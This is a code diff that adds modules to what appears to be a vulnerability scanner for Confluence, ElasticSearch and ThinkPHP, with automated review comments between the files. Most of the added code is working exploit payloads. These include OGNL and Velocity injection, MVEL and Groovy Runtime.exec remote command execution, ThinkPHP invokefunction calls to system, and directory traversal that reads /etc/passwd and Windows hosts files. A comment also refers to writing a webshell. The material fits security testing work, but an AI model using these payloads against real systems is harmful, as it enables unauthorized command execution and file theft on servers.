+ 'data': 'queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027var+isWin+%3d+java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b+var+cmd+%3d+new+java.lang.String%28%5cu0022cat%20/etc/passwd%5cu0022%29%3bvar+p+%3d+new+java.lang.ProcessBuilder%28%29%3b+if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c+%5cu0022%2fc%5cu0022%2c+cmd%29%3b+%7d+else%7bp.command%28%5cu0022bash%5cu0022%2c+%5cu0022-c%5cu0022%2c+cmd%29%3b+%7dp.redirectErrorStream%28true%29%3b+var+process%3d+p.start%28%29%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3b+var+bufferedReader+%3d+new+java.io.BufferedReader%28inputStreamReader%29%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while%28%28line+%3d+bufferedReader.readLine%28%29%29+%21%3d+null%29%7boutput+%3d+output+%2b+line+%2b+java.lang.Character.toString%2810%29%3b+%7d%5cu0027%29%7d%2b%5cu0027',
+ 'headers': head.merge(self.headers, {})
+ },
+ {
+ 'path': 'pages/doenterpagevariables.action',
+ 'data': 'queryString=%5cu0027%2b%7b555*666%7d%2b%5cu0027',
+ 'headers': head.merge(self.headers, {})
+ }
+ ]
+
+ self.cve_2015_8399_payloads = [
+ {
+ 'path': 'viewdefaultdecorator.action?decoratorName=file:///etc/passwd',
+ 'data': '',
+ 'headers': head.merge(self.headers, {})
+ },
+ {
+ 'path': 'viewdefaultdecorator.action?decoratorName=file:///C:\Windows\System32\drivers\etc\hosts',
+ 'data': '',
+ 'headers': head.merge(self.headers, {})
+ },
+ {
+ 'path': 'viewdefaultdecorator.action?decoratorName=file:///C:/Windows/System32/drivers/etc/hosts',
+ 'data': '',
+ 'headers': head.merge(self.headers, {})
+ },
+ {
+ 'path': 'viewdefaultdecorator.action?decoratorName=/WEB-INF/web.xml',
+ 'data': '',
+ 'headers': head.merge(self.headers, {})
+ },
+ # {
+ # 'path': 'spaces/viewdefaultdecorator.action?decoratorName=file:///etc/passwd',
+ # 'data': '',
+ # 'headers': head.merge(self.headers, {})
+ # },
+ # {
+ # 'path': 'spaces/viewdefaultdecorator.action?decoratorName=file:///C:\Windows\System32\drivers\etc\hosts',
+ # 'data': '',
+ # 'headers': head.merge(self.headers, {})
+ # },
+ # {
+ # 'path': 'spaces/viewdefaultdecorator.action?decoratorName=file:///C:/Windows/System32/drivers/etc/hosts',
+ # 'data': '',
+ # 'headers': head.merge(self.headers, {})
+ # },
+ # {
+ # 'path': 'spaces/viewdefaultdecorator.action?decoratorName=/WEB-INF/web.xml',
+ # 'data': '',
+ # 'headers': head.merge(self.headers, {})
+ # }
+ ]
+
+ self.cve_2022_26134_payloads = [
+ {
+ 'path': '%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22echo%20{}%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/'.format(self.md),
+ 'data': '',
+ 'headers': head.merge(self.headers, {})
+ }
+ ]
+
+ def cve_2019_3396_scan(self, url):
+ ''' Atlassian Confluence 6.14.2 版本之前存在未经授权的目录遍历漏洞,
+ 攻击者可以使用 Velocity 模板注入读取任意文件或执行任意命令
+ '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'RCE/FileRead'
+ vul_info['vul_id'] = 'CVE-2019-3396'
+ vul_info['vul_method'] = 'POST'
+
+ for payload in self.cve_2019_3396_payloads:
+ path = payload['path']
+ data = payload['data']
+ headers = payload['headers']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['headers'] = headers
+ vul_info['target'] = target
+
+ headers['Referer'] = 'http://' + logger.get_domain(url) # * Referer头, Confluence有时会有XSRF检测, 必须是目标的Host才行
+
+ try:
+ res = requests.post(
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if ((self.md in check.check_res(res.text, self.md))
+ or (('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text))
+ or (('' in res.text) and ('Confluence' in res.text))
+ or ('Microsoft Corp' in res.text)
+ or ('Microsoft TCP/IP for Windows' in res.text)
+ ):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Method': vul_info['vul_method'],
+ 'Payload': {
+ 'Url': url,
+ 'Path': path,
+ 'Data': data,
+ 'Headers': headers
+ }
+ }
+ return results
+
+ def cve_2021_26084_scan(self, url):
+ ''' Confluence存在一个OGNL注入漏洞,
+ 允许未经身份验证的攻击者在Confluence服务器或数据中心实例上执行任意代码
+ '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'RCE'
+ vul_info['vul_id'] = 'CVE-2021-26084'
+ vul_info['vul_method'] = 'POST'
+
+ for payload in self.cve_2021_26084_payloads:
+ path = payload['path']
+ data = payload['data']
+ headers = payload['headers']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['headers'] = headers
+ vul_info['target'] = target
+
+ try:
+ res = requests.post(
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if (('369630' in res.text)
+ or (('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text))
+ # or ('Microsoft Corp' in res.text)
+ # or ('Microsoft TCP/IP for Windows' in res.text)
+ ):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Method': vul_info['vul_method'],
+ 'Payload': {
+ 'Url': url,
+ 'Path': path,
+ 'Data': data,
+ 'Headers': headers
+ }
+ }
+ return results
+
+ def cve_2015_8399_scan(self, url):
+ ''' tlassian Confluence 5.8.17之前版本中存在安全,
+ 该漏洞源于spaces/viewdefaultdecorator.action和admin/viewdefaultdecorator.action文件
+ 没有充分过滤'decoratorName'参数,
+ 远程攻击者可利用该漏洞读取配置文件
+ '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'FileRead'
+ vul_info['vul_id'] = 'CVE-2015-8399'
+ vul_info['vul_method'] = 'GET'
+
+ for payload in self.cve_2015_8399_payloads:
+ path = payload['path']
+ data = payload['data']
+ headers = payload['headers']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['headers'] = headers
+ vul_info['target'] = target
+
+ try:
+ res = requests.get(
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if ((('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text))
+ or (('' in res.text) and ('Confluence' in res.text))
+ or ('Microsoft Corp' in res.text)
+ or ('Microsoft TCP/IP for Windows' in res.text)
+ ):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Method': vul_info['vul_method'],
+ 'Payload': {
+ 'Url': url,
+ 'Path': path
+ }
+ }
+ return results
+
+ def cve_2022_26134_scan(self, url):
+ ''' 2022年6月2日Atlassian官方发布了一则安全更新, 通告了一个严重且已在野利用的代码执行漏洞,
+ 攻击者利用这个漏洞即可无需任何条件在Confluence中执行任意命令
+ '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'RCE'
+ vul_info['vul_id'] = 'CVE-2022-26134'
+ vul_info['vul_method'] = 'GET'
+
+ for payload in self.cve_2022_26134_payloads:
+ path = payload['path']
+ data = payload['data']
+ headers = payload['headers']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['headers'] = headers
+ vul_info['target'] = target
+
+ try:
+ res = requests.get(
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ res_md = "'X-Cmd-Response': '" + self.md
+ if (res_md in check.check_res(str(res.headers), res_md)):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Method': vul_info['vul_method'],
+ 'Payload': {
+ 'Url': url,
+ 'Path': path
+ }
+ }
+ return results
+
+ def addscan(self, url):
+ return [
+ thread(target=self.cve_2019_3396_scan, url=url),
+ thread(target=self.cve_2021_26084_scan, url=url),
+ thread(target=self.cve_2015_8399_scan, url=url),
+ thread(target=self.cve_2022_26134_scan, url=url)
+ ]
+
+confluence = AtlassianConfluence()
\ No newline at end of file
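Review bot: `(('' in res.text) and ('Confluence' in res.text))` at L1389 and L1511 is a tautology — the empty string is in every string — so the clause collapses to `'Confluence' in res.text` and any Confluence page that merely names the product (the error page for a rejected request) reports the target as vulnerable. Presumably a marker for the web.xml payloads was meant; use a string that only occurs in the file being read, e.g. `('<web-app' in res.text) and ('Confluence' in res.text)`. The Windows-path JSON bodies at L1265 contain single backslashes (`C:\Windows\...`), and `\W` is not a valid JSON escape, so the server's JSON parser rejects that payload before the template is ever evaluated; write the literal as a raw string with doubled backslashes, `r'..."_template":"file:///C:\\Windows\\System32\\drivers\\etc\\hosts"...'`, so JSON receives `\\`. `headers['Referer'] = ...` at L1365 writes into the dict stored in `self.cve_2019_3396_payloads` of the module singleton, so the previous target's Referer persists in the payload table between scans; a per-request `head.merge(headers, {'Referer': ...})` keeps the table immutable. The docstring at L1467 reads "tlassian Confluence 5.8.17之前版本中存在安全" — "Atlassian" and "漏洞" are missing.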
diff --git a/payloads/Django.py b/payloads/Django.py
index fa9ca12..f5bae97 100644
--- a/payloads/Django.py
+++ b/payloads/Django.py
@@ -363,7 +363,8 @@ def cve_2021_35042_scan(self, url):
logger.logging(vul_info, 'Error')
return None
- if ((('OperationalError' in res.text) or ('DatabaseError' in res.text)) and ('Request information' in res.text)):
+ if ((('OperationalError' in res.text) or ('DatabaseError' in res.text))
+ and ('Request information' in res.text)):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
diff --git a/payloads/ElasticSearch.py b/payloads/ElasticSearch.py
new file mode 100644
index 0000000..ddcf5d8
--- /dev/null
+++ b/payloads/ElasticSearch.py
@@ -0,0 +1,369 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+ ElasticSearch扫描类:
+ 1. ElasticSearch 命令执行
+ CVE-2014-3120
+ Payload: https://vulhub.org/#/environments/elasticsearch/CVE-2014-3120/
+
+ 2. ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞
+ CVE-2015-1427
+ Payload: https://vulhub.org/#/environments/elasticsearch/CVE-2015-1427/
+
+ 3. ElasticSearch 目录穿越
+ CVE-2015-3337
+ Payload: https://vulhub.org/#/environments/elasticsearch/CVE-2015-3337/
+
+ 4. ElasticSearch 目录穿越
+ CVE-2015-5531
+ Payload: https://vulhub.org/#/environments/elasticsearch/CVE-2015-5531/
+
+file:///etc/passwd
+file:///C:\Windows\System32\drivers\etc\hosts
+'''
+ # Elasticsearch写入webshell
+ # WooYun-2015-110216
+
+from lib.api.dns import dns
+from lib.initial.config import config
+from lib.tool.md5 import md5, random_md5
+from lib.tool.logger import logger
+from lib.tool.thread import thread
+from lib.tool import check
+from lib.tool import head
+from thirdparty import requests
+from time import sleep
+
+class ElasticSearch():
+ def __init__(self):
+ self.timeout = config.get('timeout')
+ self.headers = config.get('headers')
+ self.proxies = config.get('proxies')
+
+ self.app_name = 'ElasticSearch'
+ self.md = md5(self.app_name)
+ self.cmd = 'echo ' + self.md
+
+ self.cve_2014_3120_payloads = [
+ {
+ 'path': 'website/blog/',
+ 'data': '{"name": "mouse"}',
+ 'headers': head.merge(self.headers, {})
+ },
+ {
+ 'path': '_search?pretty',
+ 'data': '''{
+ "size": 1,
+ "query": {
+ "filtered": {
+ "query": {
+ "match_all": {
+ }
+ }
+ }
+ },
+ "script_fields": {
+ "command": {
+ "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\"COMMAND\\").getInputStream()).useDelimiter(\\"\\\\\\\\A\\").next();"
+ }
+ }
+}'''.replace('COMMAND', self.cmd),
+ 'headers': head.merge(self.headers, {})
+ }
+ ]
+
+ self.cve_2015_1427_payloads = [
+ {
+ 'path': 'website/blog/',
+ 'data': '{"name": "mouse2"}',
+ 'headers': head.merge(self.headers, {})
+ },
+ {
+ 'path': '_search?pretty',
+ 'data': '{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"COMMAND\\").getText()"}}}'.replace('COMMAND', self.cmd),
+ 'headers': head.merge(self.headers, {})
+ }
+ ]
+
+ self.cve_2015_3337_payloads = [
+ {
+ 'path': '_plugin/head/../../../../../../../../../etc/passwd',
+ 'data': '',
+ 'headers': head.merge(self.headers, {})
+ },
+ ]
+
+ self.cve_2015_5531_payloads = [
+ {
+ 'path': '_snapshot/mouse3',
+ 'data': '{"type": "fs","settings": {"location": "/usr/share/elasticsearch/repo/mouse3"}}',
+ 'headers': head.merge(self.headers, {})
+ },
+ {
+ 'path': '_snapshot/mouse33',
+ 'data': '{"type": "fs","settings": {"location": "/usr/share/elasticsearch/repo/mouse3/snapshot-backdata"}}',
+ 'headers': head.merge(self.headers, {})
+ },
+ {
+ 'path': '_snapshot/mouse3/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd',
+ 'data': '',
+ 'headers': head.merge(self.headers, {})
+ }
+ ]
+
+ def cve_2014_3120_scan(self, url):
+ ''' 老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,
+ 而MVEL可执行Java代码, 而且没有沙盒, 所以我们可以直接执行任意代码
+ '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'RCE'
+ vul_info['vul_id'] = 'CVE-2014-3120'
+ vul_info['vul_method'] = 'POST'
+
+ for payload in self.cve_2014_3120_payloads:
+ path = payload['path']
+ data = payload['data']
+ headers = payload['headers']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['headers'] = headers
+ vul_info['target'] = target
+
+ try:
+ res = requests.post(
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ sleep(1)
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if (self.md in check.check_res(res.text, self.md)):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Method': vul_info['vul_method'],
+ 'Payload': {
+ 'Url': url,
+ 'Path': path,
+ 'Data': data
+ }
+ }
+ return results
+
+ def cve_2015_1427_scan(self, url):
+ ''' ElasticSearch支持使用“在沙盒中的”Groovy语言作为动态脚本,
+ 但显然官方的工作并没有做好, lupin和tang3分别提出了两种执行命令的方法
+ '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'RCE'
+ vul_info['vul_id'] = 'CVE-2015-1427'
+ vul_info['vul_method'] = 'POST'
+
+ for payload in self.cve_2015_1427_payloads:
+ path = payload['path']
+ data = payload['data']
+ headers = payload['headers']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['headers'] = headers
+ vul_info['target'] = target
+
+ try:
+ res = requests.post(
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ sleep(1)
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if (self.md in check.check_res(res.text, self.md)):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Method': vul_info['vul_method'],
+ 'Payload': {
+ 'Url': url,
+ 'Path': path,
+ 'Data': data
+ }
+ }
+ return results
+
+ def cve_2015_3337_scan(self, url):
+ ''' 在安装了具有“site”功能的插件以后, 插件目录使用../即可向上跳转,
+ 导致目录穿越漏洞, 可读取任意文件, 没有安装任意插件的elasticsearch不受影响
+ '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'FileRead'
+ vul_info['vul_id'] = 'CVE-2015-3337'
+ vul_info['vul_method'] = 'GET'
+
+ for payload in self.cve_2015_3337_payloads:
+ path = payload['path']
+ data = payload['data']
+ headers = payload['headers']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['headers'] = headers
+ vul_info['target'] = target
+
+ try:
+ res = requests.get(
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if (('/sbin/nologin' in res.text)
+ or ('root:x:0:0:root' in res.text)):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Method': vul_info['vul_method'],
+ 'Payload': {
+ 'Url': url,
+ 'Path': path
+ }
+ }
+ return results
+
+ def cve_2015_5531_scan(self, url):
+ ''' elasticsearch 1.5.1及以前, 无需任何配置即可触发该漏洞;
+ 之后的新版, 配置文件elasticsearch.yml中必须存在path.repo, 该配置值为一个目录, 且该目录必须可写,
+ 等于限制了备份仓库的根位置, 不配置该值, 默认不启动这个功能
+ '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'FileRead'
+ vul_info['vul_id'] = 'CVE-2015-5531'
+ # vul_info['vul_method'] = 'PUT/GET'
+ vul_info['vul_method'] = 'GET'
+
+ for payload in range(len(self.cve_2015_5531_payloads)):
+ # path = payload['path']
+ # data = payload['data']
+ # headers = payload['headers']
+
+ path = self.cve_2015_5531_payloads[payload]['path']
+ data = self.cve_2015_5531_payloads[payload]['data']
+ headers = self.cve_2015_5531_payloads[payload]['headers']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['headers'] = headers
+ vul_info['target'] = target
+
+ try:
+ if (payload in [0, 1]):
+ res = requests.put(
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ continue
+
+ # elif payload == 2
+ sleep(0.5)
+ res = requests.get(
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if (res.status_code == 400
+ and ('114, 111, 111, 116' in res.text)
+ and ('Failed to derive' in res.text)
+ ):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Method': vul_info['vul_method'],
+ 'Payload': {
+ 'Url': url,
+ 'Path': path,
+ 'Prompt': 'ASCII decimal encode'
+ }
+ }
+ return results
+
+ def addscan(self, url):
+ return [
+ thread(target=self.cve_2014_3120_scan, url=url),
+ thread(target=self.cve_2015_1427_scan, url=url),
+ thread(target=self.cve_2015_3337_scan, url=url),
+ thread(target=self.cve_2015_5531_scan, url=url)
+ ]
+
+elasticsearch = ElasticSearch()
\ No newline at end of file
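Review bot: `cve_2015_3337_scan` depends on the literal `../` segments in `_plugin/head/../../../../../../../../../etc/passwd` reaching the server, but requests prepares URLs through urllib3's `parse_url`, which since urllib3 1.25 strips dot-segments from http(s) paths; unless the vendored `thirdparty.requests` predates that, the request leaves as `/etc/passwd` and the check can never fire, so this is worth confirming against a captured request before trusting a negative result. `cve_2014_3120_scan`, `cve_2015_1427_scan` and `cve_2015_5531_scan` appear to write to the target (the `website/blog/` document POSTs and the `_snapshot/mouse3` / `_snapshot/mouse33` repository PUTs) and nothing removes those artifacts afterwards; a class-level comment such as `# NOTE: these checks create an index document / snapshot repository on the target and do not clean up` would tell operators these are not read-only probes. The bare `except:` after the `ConnectionError` handlers also catches `KeyboardInterrupt`, so `except Exception:` is the safer spelling in all four scans. `self.headers = config.get('headers')` shares the config dict with every other scanner while demo2.py in this same commit uses `config.get('headers').copy()`; if `head.merge` ever mutates its first argument the un-copied form leaks headers across scanners, so the `.copy()` variant seems the safer default. `dns` and `random_md5` are imported but never used in this file, and the same template residue is present in the new ThinkPHP.py import hunk and in demo2.py.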
diff --git a/payloads/F5BIGIP.py b/payloads/F5BIGIP.py
index 620a9ec..b71fbac 100644
--- a/payloads/F5BIGIP.py
+++ b/payloads/F5BIGIP.py
@@ -107,7 +107,14 @@ def cve_2020_5902_scan(self, url):
logger.logging(vul_info, 'Error')
return None
- if (('encrypted-password' in res.text) or ('partition-access' in res.text) or (('"output": "' in res.text) and ('"error": "",' in res.text)) or ('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text) or ('Microsoft Corp' in res.text) or ('Microsoft TCP/IP for Windows' in res.text)):
+ if (('encrypted-password' in res.text)
+ or ('partition-access' in res.text)
+ or (('"output": "' in res.text) and ('"error": "",' in res.text))
+ or ('/sbin/nologin' in res.text)
+ or ('root:x:0:0:root' in res.text)
+ or ('Microsoft Corp' in res.text)
+ or ('Microsoft TCP/IP for Windows' in res.text)
+ ):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
@@ -167,7 +174,9 @@ def cve_2022_1388_scan(self, url):
logger.logging(vul_info, 'Error')
return None
- if (('commandResult' in res.text) and (('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text))):
+ if (('commandResult' in res.text)
+ and (('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text))
+ ):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
diff --git a/payloads/Fastjson.py b/payloads/Fastjson.py
index 5d6b5fa..212eff6 100644
--- a/payloads/Fastjson.py
+++ b/payloads/Fastjson.py
@@ -130,7 +130,7 @@ def cve_2017_18349_scan(self, url):
vul_info = {}
vul_info['app_name'] = self.app_name
vul_info['vul_type'] = 'unSerialize'
- vul_info['vul_id'] = 'CVE-2017-18349'
+ vul_info['vul_id'] = 'CNVD-2017-02833'
vul_info['vul_method'] = 'POST'
vul_info['headers'] = {
'Content-Type': 'application/json'
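Review bot: The reported identifier becomes `CNVD-2017-02833` while the method is still named `cve_2017_18349_scan` (per the hunk header) and presumably still registered under that name in `addscan`, so the code name and the report label now disagree; if both ids describe the same Fastjson issue, a one-line comment next to the assignment, `# CNVD-2017-02833 (previously reported here as CVE-2017-18349)`, would stop the next reader from treating the change as a typo. The method body is outside this hunk.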
diff --git a/payloads/Spring.py b/payloads/Spring.py
index 300d982..819bc71 100644
--- a/payloads/Spring.py
+++ b/payloads/Spring.py
@@ -306,7 +306,11 @@ def cve_2020_5410_scan(self, url):
logger.logging(vul_info, 'Error')
return None
- if (('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text) or ('Microsoft Corp' in res.text) or ('Microsoft TCP/IP for Windows' in res.text)):
+ if (('/sbin/nologin' in res.text)
+ or ('root:x:0:0:root' in res.text)
+ or ('Microsoft Corp' in res.text)
+ or ('Microsoft TCP/IP for Windows' in res.text)
+ ):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
@@ -446,7 +450,9 @@ def cve_2022_22947_scan(self, url):
)
logger.logging(vul_info, res3.status_code, res3) # * LOG
- if ((res3.status_code == 200) and (('/sbin/nologin' in res3.text) or ('root:x:0:0:root' in res3.text))):
+ if ((res3.status_code == 200)
+ and (('/sbin/nologin' in res3.text)
+ or ('root:x:0:0:root' in res3.text))):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
@@ -474,7 +480,7 @@ def addscan(self, url):
return [
thread(target=self.cve_2020_5410_scan, url=url),
thread(target=self.cve_2021_21234_scan, url=url),
- # thread(target=self.cve_2022_22965_scan, url=url),
+ thread(target=self.cve_2022_22965_scan, url=url),
thread(target=self.cve_2022_22963_scan, url=url),
thread(target=self.cve_2022_22947_scan, url=url)
]
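Review bot: Re-enabling `thread(target=self.cve_2022_22965_scan, url=url)` changes what the Spring scanner sends to every target, yet neither the hunk nor the commit message records why the line was previously commented out or what was fixed; a short trailing comment, `# re-enabled in <version>: <reason>` (placeholder), would preserve that. If `cve_2022_22965_scan` modifies the target in any way, the header docstring should also say so, since operators who had the check disabled may not expect the new behaviour; the method body is outside this hunk, so I cannot confirm either way.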
diff --git a/payloads/ThinkPHP.py b/payloads/ThinkPHP.py
index 5234418..6e3e64e 100644
--- a/payloads/ThinkPHP.py
+++ b/payloads/ThinkPHP.py
@@ -19,15 +19,22 @@
暂无编号
Payload: https://vulhub.org/#/environments/thinkphp/in-sqlinjection/
+ 5. ThinkPHP5.x 远程代码执行
+ CVE-2018-1002015
+ Payload: https://www.cnblogs.com/defyou/p/15762860.html
+
其它奇奇怪怪的Payload: https://baizesec.github.io/
'''
+from lib.api.dns import dns
from lib.initial.config import config
-from lib.tool.md5 import md5
+from lib.tool.md5 import md5, random_md5
from lib.tool.logger import logger
from lib.tool.thread import thread
from lib.tool import check
+from lib.tool import head
from thirdparty import requests
+from time import sleep
class ThinkPHP():
def __init__(self):
@@ -79,6 +86,19 @@ def __init__(self):
}
]
+ self.cve_2018_1002015_payloads = [
+ {
+ 'path': 'index.php?s=index/\\think\\Container/invokefunction',
+ 'data': 'function=call_user_func_array&vars[0]=system&vars[1][]=cat /etc/passwd',
+ 'headers': head.merge(self.headers, {})
+ },
+ {
+ 'path': 'index.php?s=index/\\think\\Container/invokefunction',
+ 'data': 'function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1',
+ 'headers': head.merge(self.headers, {})
+ }
+ ]
+
# * 以下payload没有找到测试环境, 所以没写poc, 哪个好心人提供一下环境QAQ
self.thinkphp_5_options_sqlinject_payloads = [
{
@@ -158,7 +178,10 @@ def cnvd_2018_24942_scan(self, url):
return None
# * 判断扫描结果
- if (self.md in check.check_res(res.text, self.md)) or (('PHP Version' in res.text) and ('PHP License' in res.text)):
+ if (self.md in check.check_res(res.text, self.md)
+ or (('PHP Version' in res.text)
+ and ('PHP License' in res.text))
+ ):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
@@ -212,7 +235,7 @@ def cnnvd_201901_445_scan(self, url):
return None
# * 判断扫描结果
- if self.md in check.check_res(res.text, self.md):
+ if (self.md in check.check_res(res.text, self.md)):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
@@ -334,12 +357,72 @@ def thinkphp_5_ids_sqlinject_scan(self, url):
}
return results
+ def cve_2018_1002015_scan(self, url):
+ ''' ThinkPHP 5.0.23及5.1.31以下版本RCE
+ ThinkPHP 5.0.x版本和5.1.x版本中存在远程代码执行漏洞,
+ 该漏洞源于ThinkPHP在获取控制器名时未对用户提交的参数进行严格的过滤,
+ 远程攻击者可通过输入字符 \ 的方式调用任意方法利用该漏洞执行代码
+ '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'RCE'
+ vul_info['vul_id'] = 'CVE-2018-1002015'
